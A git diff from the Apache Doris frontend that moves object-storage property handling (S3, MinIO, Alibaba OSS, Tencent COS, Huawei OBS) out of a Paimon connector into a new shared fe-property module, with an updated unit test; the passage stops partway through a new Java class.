firstNonBlankOrDefault(props, S3_DEFAULT_CONN_TIMEOUT, S3_CONN_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, S3_PATH_STYLE_ALIASES)); - } - - /** - * Port of legacy {@code AbstractS3CompatibleProperties.appendS3HdfsProperties} — the S3A base block that - * S3/OSS/COS/OBS all inherit via {@code super.initializeHadoopStorageConfig()}. The caller resolves the - * credentials AND the 4 tuning values from its OWN scheme aliases/defaults (so a pure-{@code oss.*} catalog - * never re-reads {@code s3.*} keys, and AWS S3 gets its 50/3000/1000 defaults while OSS/COS/OBS get - * 100/10000/10000); this helper only emits. {@code fs.s3a.endpoint}/{@code endpoint.region} are CONDITIONAL - * here — legacy emits them unconditionally via {@code Preconditions.checkNotNull}, but the connector has no - * {@code setRegionIfPossible} throw-guard, so it omits them when blank (matches the existing connector style). - */ - private static void applyS3aBaseConfig(BiConsumer setter, String ak, String sk, - String token, String endpoint, String region, String maxConnections, String requestTimeoutMs, - String connectionTimeoutMs, String usePathStyle) { - setter.accept("fs.s3.impl", S3A_IMPL); - setter.accept("fs.s3a.impl", S3A_IMPL); - setter.accept("fs.s3.impl.disable.cache", "true"); - setter.accept("fs.s3a.impl.disable.cache", "true"); - if (StringUtils.isNotBlank(endpoint)) { - setter.accept("fs.s3a.endpoint", endpoint); - } - if (StringUtils.isNotBlank(region)) { - setter.accept("fs.s3a.endpoint.region", region); - } - if (StringUtils.isNotBlank(ak)) { - setter.accept("fs.s3a.aws.credentials.provider", S3A_SIMPLE_CRED_PROVIDER); - setter.accept("fs.s3a.access.key", ak); - setter.accept("fs.s3a.secret.key", nullToEmpty(sk)); - if (StringUtils.isNotBlank(token)) { - setter.accept("fs.s3a.session.token", token); - } - } - setter.accept("fs.s3a.connection.maximum", maxConnections); - setter.accept("fs.s3a.connection.request.timeout", requestTimeoutMs); - setter.accept("fs.s3a.connection.timeout", connectionTimeoutMs); - setter.accept("fs.s3a.path.style.access", usePathStyle); - } - - /** - * Translates the canonical {@code minio.*} (plus the shared {@code s3.*}/{@code AWS_*}) aliases into the - * {@code fs.s3a.*} keys the live S3A FileIO reads. Port of legacy {@code MinioProperties}, which extends - * {@code AbstractS3CompatibleProperties} (schema {@code s3}) and therefore emits ONLY the S3A base block via - * {@link #applyS3aBaseConfig} — no MinIO-specific impl keys (a MinIO bucket is reached as an ordinary S3A - * instance over {@code s3://}; this is what registers {@code fs.s3.impl} so Paimon's FileIO resolves the - * {@code s3} scheme). Detection mirrors legacy {@code MinioProperties.guessIsMe} narrowly: fire only when a - * dedicated {@code minio.*} key is present, so a pure-{@code s3.*} catalog (no {@code minio.} key) is left to - * {@link #applyCanonicalS3Config} and keeps its own S3 tuning defaults. The region defaults to - * {@code us-east-1} and the connection tuning to 100/10000/10000, both per legacy {@code MinioProperties}. - */ - private static void applyCanonicalMinioConfig(Map props, BiConsumer setter) { - if (!anyKeyStartsWith(props, "minio.")) { - return; - } - String ak = firstNonBlank(props, MINIO_ACCESS_KEY_ALIASES); - String sk = firstNonBlank(props, MINIO_SECRET_KEY_ALIASES); - String endpoint = firstNonBlank(props, MINIO_ENDPOINT_ALIASES); - String region = firstNonBlankOrDefault(props, MINIO_DEFAULT_REGION, MINIO_REGION_ALIASES); - String token = firstNonBlank(props, MINIO_SESSION_TOKEN_ALIASES); - applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_MAX_CONN, MINIO_MAX_CONN_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_REQ_TIMEOUT, MINIO_REQ_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_CONN_TIMEOUT, MINIO_CONN_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, MINIO_PATH_STYLE_ALIASES)); - } - - /** - * Translates the canonical {@code oss.*}/{@code fs.oss.*}/{@code dlf.*} credential aliases into - * the Jindo {@code fs.oss.*} keys the live OSS FileIO reads. Port of legacy - * {@code OSSProperties.initializeHadoopStorageConfig} OSS block. Detection keys off OSS-specific - * aliases only (NOT {@code s3.*}), so a pure-{@code s3.*} catalog does not trigger the Jindo - * block (it is an S3 catalog, covered by {@link #applyCanonicalS3Config}); a pure-{@code oss.*} - * catalog triggers this block. - */ - private static void applyCanonicalOssConfig(Map props, BiConsumer setter) { - String ak = firstNonBlank(props, OSS_ACCESS_KEY_ALIASES); - String sk = firstNonBlank(props, OSS_SECRET_KEY_ALIASES); - String endpoint = firstNonBlank(props, OSS_ENDPOINT_ALIASES); - String region = firstNonBlank(props, OSS_REGION_ALIASES); - String token = firstNonBlank(props, OSS_SESSION_TOKEN_ALIASES); - if (ak == null && endpoint == null && region == null) { - return; - } - // Endpoint-from-region (legacy OSSProperties.initNormalizeAndCheckProps -> getOssEndpoint): when no - // explicit oss.endpoint is given, derive oss-[-internal].aliyuncs.com. publicAccess defaults - // to false (=> -internal), sourced from dlf.access.public/dlf.catalog.accessPublic (the only legacy - // dlfAccessPublic aliases). This is the SAME derivation the DLF flavor used (its former DLF-local - // block in buildDlfHiveConf is now removed) and that the legacy HMS+OSS path got via OSSProperties.of(). - if (StringUtils.isBlank(endpoint) && StringUtils.isNotBlank(region)) { - boolean publicAccess = BooleanUtils.toBoolean( - firstNonBlank(props, "dlf.access.public", "dlf.catalog.accessPublic")); - endpoint = "oss-" + region + (publicAccess ? "" : "-internal") + ".aliyuncs.com"; - } - // Emit the S3A base too (legacy OSS inherits it via super.appendS3HdfsProperties) for s3://-over-OSS. - applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_MAX_CONN, OSS_MAX_CONN_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_REQ_TIMEOUT, OSS_REQ_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_CONN_TIMEOUT, OSS_CONN_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, OSS_PATH_STYLE_ALIASES)); - // Jindo OSS keys (legacy OSSProperties.initializeHadoopStorageConfig). - setter.accept("fs.oss.impl", JINDO_OSS_IMPL); - setter.accept("fs.AbstractFileSystem.oss.impl", JINDO_OSS_ABSTRACT_IMPL); - if (StringUtils.isNotBlank(ak)) { - setter.accept("fs.oss.accessKeyId", ak); - setter.accept("fs.oss.accessKeySecret", nullToEmpty(sk)); - } - if (StringUtils.isNotBlank(token)) { - setter.accept("fs.oss.securityToken", token); - } - if (StringUtils.isNotBlank(endpoint)) { - setter.accept("fs.oss.endpoint", endpoint); - } - if (StringUtils.isNotBlank(region)) { - setter.accept("fs.oss.region", region); - } - } - - /** - * Translates the canonical {@code cos.*}/{@code s3.*} aliases into the {@code fs.cosn.*} keys the Tencent - * COS FileIO reads. Port of legacy {@code COSProperties.initializeHadoopStorageConfig}, which emits the S3A - * base via {@code super} FIRST, then the cosn keys. Detection mirrors legacy {@code COSProperties.guessIsMe} - * (endpoint/uri PATTERN, not the scheme key), augmented with the {@code cos.*} key signal: fire when any - * {@code cos.*} key is present OR a resolved endpoint/warehouse value contains {@code myqcloud.com}. The - * {@code fs.cosn.*} keys are emitted UNCONDITIONALLY (legacy parity — an empty value is written, not absent). - */ - private static void applyCanonicalCosConfig(Map props, BiConsumer setter) { - String endpoint = firstNonBlank(props, COS_ENDPOINT_ALIASES); - if (!anyKeyStartsWith(props, "cos.") - && !containsToken(endpoint, "myqcloud.com") - && !containsToken(props.get(PaimonConnectorProperties.WAREHOUSE), "myqcloud.com")) { - return; - } - String ak = firstNonBlank(props, COS_ACCESS_KEY_ALIASES); - String sk = firstNonBlank(props, COS_SECRET_KEY_ALIASES); - String region = firstNonBlank(props, COS_REGION_ALIASES); - String token = firstNonBlank(props, COS_SESSION_TOKEN_ALIASES); - applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_MAX_CONN, COS_MAX_CONN_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_REQ_TIMEOUT, COS_REQ_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_CONN_TIMEOUT, COS_CONN_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, COS_PATH_STYLE_ALIASES)); - setter.accept("fs.cos.impl", S3A_IMPL); - setter.accept("fs.cosn.impl", S3A_IMPL); - setter.accept("fs.cosn.bucket.region", nullToEmpty(region)); - setter.accept("fs.cosn.userinfo.secretId", nullToEmpty(ak)); - setter.accept("fs.cosn.userinfo.secretKey", nullToEmpty(sk)); - } - - /** - * Translates the canonical {@code obs.*}/{@code s3.*} aliases into the {@code fs.obs.*} keys the Huawei OBS - * FileIO reads. Port of legacy {@code OBSProperties.initializeHadoopStorageConfig}: S3A base via {@code super} - * FIRST, then the obs keys, preferring the native {@code OBSFileSystem} when it is on the classpath, else the - * S3A fallback. Detection mirrors legacy {@code OBSProperties.guessIsMe}: any {@code obs.*} key OR a resolved - * endpoint/warehouse containing {@code myhuaweicloud.com}. The {@code fs.obs.*} keys are UNCONDITIONAL. - */ - private static void applyCanonicalObsConfig(Map props, BiConsumer setter) { - String endpoint = firstNonBlank(props, OBS_ENDPOINT_ALIASES); - if (!anyKeyStartsWith(props, "obs.") - && !containsToken(endpoint, "myhuaweicloud.com") - && !containsToken(props.get(PaimonConnectorProperties.WAREHOUSE), "myhuaweicloud.com")) { - return; - } - String ak = firstNonBlank(props, OBS_ACCESS_KEY_ALIASES); - String sk = firstNonBlank(props, OBS_SECRET_KEY_ALIASES); - String region = firstNonBlank(props, OBS_REGION_ALIASES); - String token = firstNonBlank(props, OBS_SESSION_TOKEN_ALIASES); - applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_MAX_CONN, OBS_MAX_CONN_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_REQ_TIMEOUT, OBS_REQ_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, OBJ_STORE_DEFAULT_CONN_TIMEOUT, OBS_CONN_TIMEOUT_ALIASES), - firstNonBlankOrDefault(props, DEFAULT_PATH_STYLE, OBS_PATH_STYLE_ALIASES)); - // obs is not s3a-compatible; prefer the native OBSFileSystem when it is on the classpath (legacy - // OBSProperties.isClassAvailable). The connector's child-first loader delegates this non-plugin class - // to the host parent, so the answer matches legacy's. - if (isClassAvailable(OBS_NATIVE_IMPL)) { - setter.accept("fs.obs.impl", OBS_NATIVE_IMPL); - setter.accept("fs.AbstractFileSystem.obs.impl", OBS_NATIVE_ABSTRACT_IMPL); - } else { - setter.accept("fs.obs.impl", S3A_IMPL); - } - setter.accept("fs.obs.access.key", nullToEmpty(ak)); - setter.accept("fs.obs.secret.key", nullToEmpty(sk)); - setter.accept("fs.obs.endpoint", nullToEmpty(endpoint)); - } - /** * Builds the {@link HiveConf} for the {@code hms} flavor, reconstructed from the raw property * map. Replaces fe-core {@code HMSBaseProperties.getHiveConf()} minimally: sets all {@code hive.*} @@ -917,8 +583,8 @@ public static HiveConf buildDlfHiveConf(Map props) { hiveConf.set("dlf.catalog.id", nullToEmpty(catalogId)); hiveConf.set("dlf.catalog.proxyMode", proxyMode); // Overlay the OSS storage config (legacy ossProps.getHadoopStorageConfig + appendUserHadoopConfig). - // The OSS endpoint-from-region derivation now lives in applyCanonicalOssConfig (shared with the - // filesystem/hms flavors, using the same dlf.access.public source), so no DLF-local derivation is + // The OSS endpoint-from-region derivation now lives in the shared fe-property OSSProperties (used by the + // filesystem/hms flavors too, with the same dlf.access.public source), so no DLF-local OSS derivation is // needed here. applyStorageConfig(props, hiveConf::set); return hiveConf; @@ -957,32 +623,4 @@ private static String nullToEmpty(String s) { return s == null ? "" : s; } - /** As {@link #firstNonBlank}, but returns {@code defaultValue} (not null) when no key is set. */ - private static String firstNonBlankOrDefault(Map props, String defaultValue, String... keys) { - String value = firstNonBlank(props, keys); - return value != null ? value : defaultValue; - } - - private static boolean anyKeyStartsWith(Map props, String prefix) { - for (String key : props.keySet()) { - if (key != null && key.startsWith(prefix)) { - return true; - } - } - return false; - } - - private static boolean containsToken(String value, String token) { - return value != null && value.contains(token); - } - - /** Whether {@code className} is loadable (legacy {@code OBSProperties.isClassAvailable} parity). */ - private static boolean isClassAvailable(String className) { - try { - Class.forName(className, false, PaimonCatalogFactory.class.getClassLoader()); - return true; - } catch (ClassNotFoundException e) { - return false; - } - } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index eb65fe26c1d44d..fd632cdfd501f8 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -956,11 +956,12 @@ public void buildHadoopConfigurationEmitsCosRegionUnconditionally() { "cos.secret_key", "csk", "cos.endpoint", "cos.ap-beijing.myqcloud.com")); - // WHY (RT-critic): legacy COSProperties writes fs.cosn.bucket.region UNCONDITIONALLY (even when blank), - // unlike the isNotBlank-guarded S3/OSS cred block — an empty key differs from an absent key for - // downstream Hadoop default resolution. MUTATION: guarding fs.cosn.bucket.region behind isNotBlank - // (absent when no region) -> red. - Assertions.assertEquals("", conf.get("fs.cosn.bucket.region")); + // WHY: COSProperties writes fs.cosn.bucket.region UNCONDITIONALLY (always emitted, never absent). After the + // migration to the shared fe-property COSProperties, the region is DERIVED from the + // cos..myqcloud.com endpoint (faithful to legacy COSProperties.endpointPatterns) — so a cosn + // catalog with an endpoint but no explicit cos.region now gets the endpoint-derived region instead of the + // old hand-port's blank value. MUTATION: not emitting fs.cosn.bucket.region -> red. + Assertions.assertEquals("ap-beijing", conf.get("fs.cosn.bucket.region")); } @Test diff --git a/fe/fe-property/pom.xml b/fe/fe-property/pom.xml new file mode 100644 index 00000000000000..ab4d37ad8c6e26 --- /dev/null +++ b/fe/fe-property/pom.xml @@ -0,0 +1,137 @@ + + + + 4.0.0 + + org.apache.doris + ${revision} + fe + ../pom.xml + + fe-property + jar + Doris FE Property + Reusable data-source property parsing/validation/normalization for Doris FE modules and SPI connectors. + Parses raw user properties into typed, validated objects and normalized property maps; it does NOT construct + live storage/catalog objects (Configuration/Catalog/credential providers) — consumers build those from the + normalized maps using their own SDKs. Heavy dependencies are declared 'provided' so they are never shipped in + this module's jar. + + + + + ${project.groupId} + fe-foundation + + + + + org.apache.commons + commons-lang3 + + + org.apache.commons + commons-collections4 + + + com.google.guava + guava + + + org.apache.logging.log4j + log4j-api + + + org.projectlombok + lombok + provided + + + + + org.apache.hadoop + hadoop-common + provided + + + + org.junit.jupiter + junit-jupiter + test + + + + + doris-fe-property + ${project.basedir}/target/ + + + org.apache.maven.plugins + maven-jar-plugin + + + prepare-test-jar + test-compile + + test-jar + + + + + + org.apache.maven.plugins + maven-javadoc-plugin + + true + + + + + + + release + + + + org.apache.maven.plugins + maven-source-plugin + + true + + + + create-source-jar + + jar-no-fork + test-jar-no-fork + + + + + + + + + diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/ConnectionProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/ConnectionProperties.java new file mode 100644 index 00000000000000..6164e32ee8a182 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/ConnectionProperties.java @@ -0,0 +1,139 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.base.Strings; +import com.google.common.collect.Maps; +import lombok.Getter; +import lombok.Setter; +import org.apache.hadoop.conf.Configuration; + +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Objects; + +public abstract class ConnectionProperties { + /** + * The original user-provided properties. + *

      + * This map may contain various configuration entries, not all of which are relevant + * to the specific Connector implementation. It serves as the raw input from the user. + */ + @Getter + @Setter + protected Map origProps; + + /** + * The filtered properties that are actually used by the Connector. + *

      + * This map only contains key-value pairs that are recognized and matched by + * the specific Connector implementation. It's a subset of {@code origProps}. + */ + @Getter + protected Map matchedProperties = new HashMap<>(); + + protected ConnectionProperties(Map origProps) { + this.origProps = origProps; + } + + public void initNormalizeAndCheckProps() { + ConnectorPropertiesUtils.bindConnectorProperties(this, origProps); + for (Field field : ConnectorPropertiesUtils.getConnectorProperties(this.getClass())) { + ConnectorProperty annotation = field.getAnnotation(ConnectorProperty.class); + for (String name : annotation.names()) { + if (origProps.containsKey(name)) { + matchedProperties.put(name, origProps.get(name)); + break; + } + } + } + // 3. check properties + checkRequiredProperties(); + } + + // Some properties may be loaded from file + // Subclass can override this method to load properties from file. + // The return value is the properties loaded from file, not include original properties + protected Map loadConfigFromFile(String resourceConfig) { + if (Strings.isNullOrEmpty(resourceConfig)) { + return new HashMap<>(); + } + Configuration conf = PropertyConfigLoader.loadConfigurationFromHadoopConfDir(resourceConfig); + Map confMap = Maps.newHashMap(); + for (Map.Entry entry : conf) { + confMap.put(entry.getKey(), entry.getValue()); + } + return confMap; + } + + // Subclass can override this method to return the property name of resource config. + protected String getResourceConfigPropName() { + return null; + } + + // This method will check if all required properties are set. + // Subclass can implement this method for additional check. + protected void checkRequiredProperties() { + List supportedProps = ConnectorPropertiesUtils.getConnectorProperties(this.getClass()); + for (Field field : supportedProps) { + field.setAccessible(true); + ConnectorProperty anno = field.getAnnotation(ConnectorProperty.class); + String[] names = anno.names(); + if (anno.required() && field.getType().equals(String.class)) { + try { + String value = (String) field.get(this); + if (Strings.isNullOrEmpty(value)) { + throw new IllegalArgumentException("Property " + names[0] + " is required."); + } + } catch (IllegalAccessException e) { + throw new StoragePropertiesException("Failed to get property " + names[0] + + ", " + e.getMessage(), e); + } + } + } + } + + /** + * Two ConnectionProperties are equal if they are of the same concrete type and + * have the same original properties. This ensures that logically identical + * configurations share the same cache key in {@code FileSystemCache}, preventing + * cache entry duplication and use-after-eviction race conditions. + */ + @Override + public boolean equals(Object obj) { + if (this == obj) { + return true; + } + if (obj == null || getClass() != obj.getClass()) { + return false; + } + ConnectionProperties other = (ConnectionProperties) obj; + return Objects.equals(origProps, other.origProps); + } + + @Override + public int hashCode() { + return Objects.hash(getClass().getName(), origProps); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/PropertyConfigLoader.java b/fe/fe-property/src/main/java/org/apache/doris/property/PropertyConfigLoader.java new file mode 100644 index 00000000000000..7d5dc072c3bd96 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/PropertyConfigLoader.java @@ -0,0 +1,81 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property; + +import org.apache.commons.lang3.StringUtils; +import org.apache.hadoop.conf.Configuration; +import org.apache.hadoop.fs.Path; + +import java.io.File; + +/** + * Loads Hadoop XML configuration files (e.g. {@code hdfs-site.xml} / {@code core-site.xml}) referenced by + * {@code hadoop.config.resources} into a Hadoop {@link Configuration}. This mirrors the legacy fe-core + * {@code CatalogConfigFileUtils.loadConfigurationFromHadoopConfDir} but lives in fe-property so the module does + * not depend on fe-core/fe-common. + * + *

      The base directory under which the named resource files are resolved is {@link #hadoopConfigDir}. It defaults + * to {@code $DORIS_HOME/plugins/hadoop_conf/} (matching legacy {@code Config.hadoop_config_dir}); the engine may + * override it at startup. hadoop-common is a {@code provided} dependency of fe-property — present at compile time + * and supplied at runtime by every consumer (fe-core, SPI connector plugins) — and is never packaged in this jar. + */ +public final class PropertyConfigLoader { + + /** + * Base directory under which {@code hadoop.config.resources} file names are resolved. Defaults to + * {@code $DORIS_HOME/plugins/hadoop_conf/}; the engine may overwrite it at startup to match its own + * {@code Config.hadoop_config_dir}. + */ + public static volatile String hadoopConfigDir = defaultHadoopConfigDir(); + + private PropertyConfigLoader() { + } + + private static String defaultHadoopConfigDir() { + String home = System.getenv("DORIS_HOME"); + if (StringUtils.isBlank(home)) { + home = System.getProperty("doris.home", ""); + } + return home + "/plugins/hadoop_conf/"; + } + + /** + * Loads a Hadoop {@link Configuration} from the comma-separated list of file names, each resolved under + * {@link #hadoopConfigDir}. + * + * @param resourcesPath comma-separated list of config file names + * @return a Hadoop Configuration with the named files added as resources + * @throws IllegalArgumentException if the input is blank or a referenced file is missing + */ + public static Configuration loadConfigurationFromHadoopConfDir(String resourcesPath) { + if (StringUtils.isBlank(resourcesPath)) { + throw new IllegalArgumentException("Config resource path is empty"); + } + Configuration conf = new Configuration(); + for (String resource : resourcesPath.split(",")) { + String resourcePath = hadoopConfigDir + resource.trim(); + File file = new File(resourcePath); + if (file.exists() && file.isFile()) { + conf.addResource(new Path(file.toURI())); + } else { + throw new IllegalArgumentException("Config resource file does not exist: " + resourcePath); + } + } + return conf; + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/common/AwsCredentialsProviderMode.java b/fe/fe-property/src/main/java/org/apache/doris/property/common/AwsCredentialsProviderMode.java new file mode 100644 index 00000000000000..da698f8c656e58 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/common/AwsCredentialsProviderMode.java @@ -0,0 +1,74 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.common; + +public enum AwsCredentialsProviderMode { + + DEFAULT("DEFAULT"), + + ENV("ENV"), + + SYSTEM_PROPERTIES("SYSTEM_PROPERTIES"), + + WEB_IDENTITY("WEB_IDENTITY"), + + CONTAINER("CONTAINER"), + + INSTANCE_PROFILE("INSTANCE_PROFILE"), + + ANONYMOUS("ANONYMOUS"); + + private final String mode; + + AwsCredentialsProviderMode(String mode) { + this.mode = mode; + } + + public String getMode() { + return mode; + } + + + public static AwsCredentialsProviderMode fromString(String value) { + if (value == null || value.isEmpty()) { + return DEFAULT; + } + + String normalized = value.trim().toUpperCase().replace('-', '_'); + + switch (normalized) { + case "ENV": + return ENV; + case "SYSTEM_PROPERTIES": + return SYSTEM_PROPERTIES; + case "WEB_IDENTITY": + return WEB_IDENTITY; + case "CONTAINER": + return CONTAINER; + case "INSTANCE_PROFILE": + return INSTANCE_PROFILE; + case "ANONYMOUS": + return ANONYMOUS; + case "DEFAULT": + return DEFAULT; + default: + throw new IllegalArgumentException( + "Unsupported AWS credentials provider mode: " + value); + } + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AbstractS3CompatibleProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AbstractS3CompatibleProperties.java new file mode 100644 index 00000000000000..840fbd30605f62 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AbstractS3CompatibleProperties.java @@ -0,0 +1,318 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.StoragePropertiesException; +import org.apache.doris.property.common.AwsCredentialsProviderMode; + +import org.apache.commons.lang3.StringUtils; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.lang.reflect.Field; +import java.util.Arrays; +import java.util.HashMap; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Matcher; +import java.util.regex.Pattern; + +/** + * Abstract base class for object storage system properties. This class provides common configuration + * settings for object storage systems and supports conversion of these properties into configuration + * maps for different protocols, such as AWS S3. All object storage systems should extend this class + * to inherit the common configuration properties and methods. + *

      + * The properties include connection settings (e.g., timeouts and maximum connections) and a flag to + * determine if path-style URLs should be used for the storage system. + */ +public abstract class AbstractS3CompatibleProperties extends StorageProperties implements ObjectStorageProperties { + private static final Logger LOG = LogManager.getLogger(AbstractS3CompatibleProperties.class); + + /** + * Constructor to initialize the object storage properties with the provided type and original properties map. + * + * @param type the type of object storage system. + * @param origProps the original properties map. + */ + protected AbstractS3CompatibleProperties(Type type, Map origProps) { + super(type, origProps); + } + + /** + * Generates a map of AWS S3 configuration properties specifically for Backend (BE) service usage. + * This configuration includes endpoint, region, access credentials, timeouts, and connection settings. + * The map is typically used to initialize S3-compatible storage access for the backend. + * + * @param maxConnections the maximum number of allowed S3 connections. + * @param requestTimeoutMs request timeout in milliseconds. + * @param connectionTimeoutMs connection timeout in milliseconds. + * @param usePathStyle whether to use path-style access (true/false). + * @return a map containing AWS S3 configuration properties. + */ + protected Map generateBackendS3Configuration(String maxConnections, + String requestTimeoutMs, + String connectionTimeoutMs, + String usePathStyle) { + return doBuildS3Configuration(maxConnections, requestTimeoutMs, connectionTimeoutMs, usePathStyle); + } + + /** + * Overloaded version of {@link #generateBackendS3Configuration(String, String, String, String)} + * that uses default values + * from the current object context for connection settings. + * + * @return a map containing AWS S3 configuration properties. + */ + protected Map generateBackendS3Configuration() { + return doBuildS3Configuration(getMaxConnections(), getRequestTimeoutS(), getConnectionTimeoutS(), + getUsePathStyle()); + } + + /** + * Internal method to centralize S3 configuration property assembly. + */ + private Map doBuildS3Configuration(String maxConnections, + String requestTimeoutMs, + String connectionTimeoutMs, + String usePathStyle) { + Map s3Props = new HashMap<>(); + s3Props.put("AWS_ENDPOINT", getEndpoint()); + s3Props.put("AWS_REGION", getRegion()); + s3Props.put("AWS_ACCESS_KEY", getAccessKey()); + s3Props.put("AWS_SECRET_KEY", getSecretKey()); + s3Props.put("AWS_MAX_CONNECTIONS", maxConnections); + s3Props.put("AWS_REQUEST_TIMEOUT_MS", requestTimeoutMs); + s3Props.put("AWS_CONNECTION_TIMEOUT_MS", connectionTimeoutMs); + s3Props.put("use_path_style", usePathStyle); + if (StringUtils.isNotBlank(getSessionToken())) { + s3Props.put("AWS_TOKEN", getSessionToken()); + } + String credentialsProviderType = getAwsCredentialsProviderTypeForBackend(); + if (StringUtils.isNotBlank(credentialsProviderType)) { + s3Props.put("AWS_CREDENTIALS_PROVIDER_TYPE", credentialsProviderType); + } + return s3Props; + } + + protected String getAwsCredentialsProviderTypeForBackend() { + if (StringUtils.isBlank(getAccessKey()) && StringUtils.isBlank(getSecretKey())) { + return AwsCredentialsProviderMode.ANONYMOUS.name(); + } + return null; + } + + @Override + public Map getBackendConfigProperties() { + return generateBackendS3Configuration(); + } + + @Override + public void initNormalizeAndCheckProps() { + super.initNormalizeAndCheckProps(); + setEndpointIfPossible(); + setRegionIfPossible(); + // NOTE (fe-property leniency — matches the connector storage-config port): region/endpoint are NOT + // required here. setEndpointIfPossible/setRegionIfPossible derive them when possible; if still blank, the + // corresponding fs.s3a.endpoint[.region] key is simply omitted (see appendS3HdfsProperties) instead of + // failing fast. Legacy fe-core threw; the connector emits conditionally, and that behavior is preserved so + // a connector catalog that delegates parsing here keeps its current (lenient) runtime behavior. + } + + /** + * Checks and validates the configured endpoint. + *

      + * All object storage implementations must have an explicitly set endpoint. + * However, for compatibility with legacy behavior—especially when using DLF + * as the catalog—some logic may derive the endpoint based on the region. + *

      + * To support such cases, this method is exposed as {@code protected} to allow + * subclasses to override it with custom logic if necessary. + *

